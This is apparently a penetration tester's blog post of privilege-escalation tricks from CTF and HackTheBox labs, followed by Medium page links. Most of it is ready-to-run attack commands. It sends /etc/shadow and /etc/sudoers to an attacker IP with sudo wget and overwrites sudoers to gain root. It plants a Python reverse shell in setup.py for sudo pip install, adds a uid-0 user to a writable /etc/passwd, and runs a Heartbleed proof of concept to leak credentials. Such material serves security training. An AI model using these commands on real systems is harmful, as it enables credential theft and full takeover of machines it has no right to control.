Unique Priv-Esc Methods

I will be adding to this post occasionally, but the purpose of this post is to cover one-off privilege escalation methods found in the wild that are too specific to be covered in a dedicated post. If you find any unique methods please let me know in the contact form.

TMUX socket running as root

If the TMUX session is running as root, attach to the session and run any commands you’d like as root. You can run the history command as well to get more info about how the TMUX session was started.

# List out TMUX sessionstmux ls# Attach to TMUX sessiontmux -S /.devs/dev_sess

Reading deleted files off mounted drive

In a HackTheBox machine called Mirai, you needed to mount a USB storage device and recover the contents using the strings command. The root flag was in the last location.

# List out filesystemsdf -lh# Navigate to the drivecd /media/usbstick/# Use strings to view contents of other drivestrings /dev/sdb# Or we can use debugfs to view the contentsdebugfs /dev/sda1

Heartbleed credential leak

You can use the Heartbleed bug to extract credentials from a server.

# Download POC from https://github.com/sensepost/heartbleed-poc# Run the python script against the server to view outputpython heartbleed-poc.py <target_ip_address>

Wget with root privileges

Technically this technique could fall under my Abusing SUDO article, but I thought it was interesting so I put it here. Essentially, if you run sudo -l and you see that you can run wget with sudo privileges, you can do quite a few things since wget can get and send files:

# Sending files to our netcat listener on 10.10.10.99:sudo wget --post-file=/etc/shadow 10.10.10.99# Our listener can be run by using "nc -nvlp 80"----------# Download /etc/sudoers file to our machine with a netcat listner:sudo wget --post-file=/etc/sudoers 10.10.10.99# Edit the file so the user we are imitading has (root) NOPASSWD: ALL permissions# Download the file back to the target machine and it'll overwrite the original sudoers file:sudo wget 10.10.10.99/modified_sudoers --output-docuemtn=/etc/sudoers# Run "sudo su" to get rootsudo su

Non-tty shell

This one is kinda vague and it may be a little “CTF-like”, but the idea is that some shells that aren’t TTY, may have some escape sequences that can be found using the man-page:

# Check man pageman <shell_name># Read through the man page and see if there are any escape sequences:!/bin/sh# The command above may or may not work but it's an example of just one escape sequence.

World writable /etc/passwd file

This one will never be on a server by default because the permissions -rw-rw-rw are not the default for the /etc/passwd file, but you may find it in some labs and CTF boxes.

# On Kali machine, create a new hash for a new user "bob"root@kali:$ openssl passwd -lpassword:Verifying - Password:$1$nMgWTHVG$RngZLV/8YdusVQDL0Qe9E.# Now write this new entry into the /etc/passwd file for user "bob"bob:$1$nMgWTHVG$RngZLV/8YdusVQDL0Qe9E.:0:0:bob:/root:/bin/bash# Get a root shellsu - bob

pip install with sudo

If we have sudo privileges to run pip install, after checking with sudo -l, we can create a file called setup.py and include our reverse shell below in it:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

On our computer we have a netcat listener using nc -nvlp 1234. Now we run our pip install . command and we can get a root shell:

sudo pip install .

Steganography

Steganography is the hiding of information within another file. This subject has so many other resources out there for how to file hidden files within files and images. But just know that some images and files may be hiding information that you can’t initially see. I will point you to some resources that I have found helpful:

--

--

--

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

[Some Interesting] Cloud ‘n Sec news: 06th May 22

Zero-Day Vulnerability: The Evolving Attacks That Can Threaten Your Data

Whales attack Cardano; Increase in the number of ADA $ 100,000 transactions

{UPDATE} kampsport bryting champion Hack Free Resources Generator

Will Certificate Authorities Become Targets for DMCA Takedowns?

Why it’s important to not have repeating passwords

How to file a GDPR complaint against MUIC in four easy steps

FinCEN Files: Banks’ Know-Your-Costumer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Recipe For Root

Recipe For Root

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP

More from Medium

Kubernetes Network Policy or Blocking External Traffic will Slightly Reduce log4j Attack, not…

[Offensive security] How toconduct server-side request forgery (SSRF)

Fundamentals of Identity and Access management in Azure Active Directory (AAD)

Deserialization Vulnerability From A Developer’s Perspective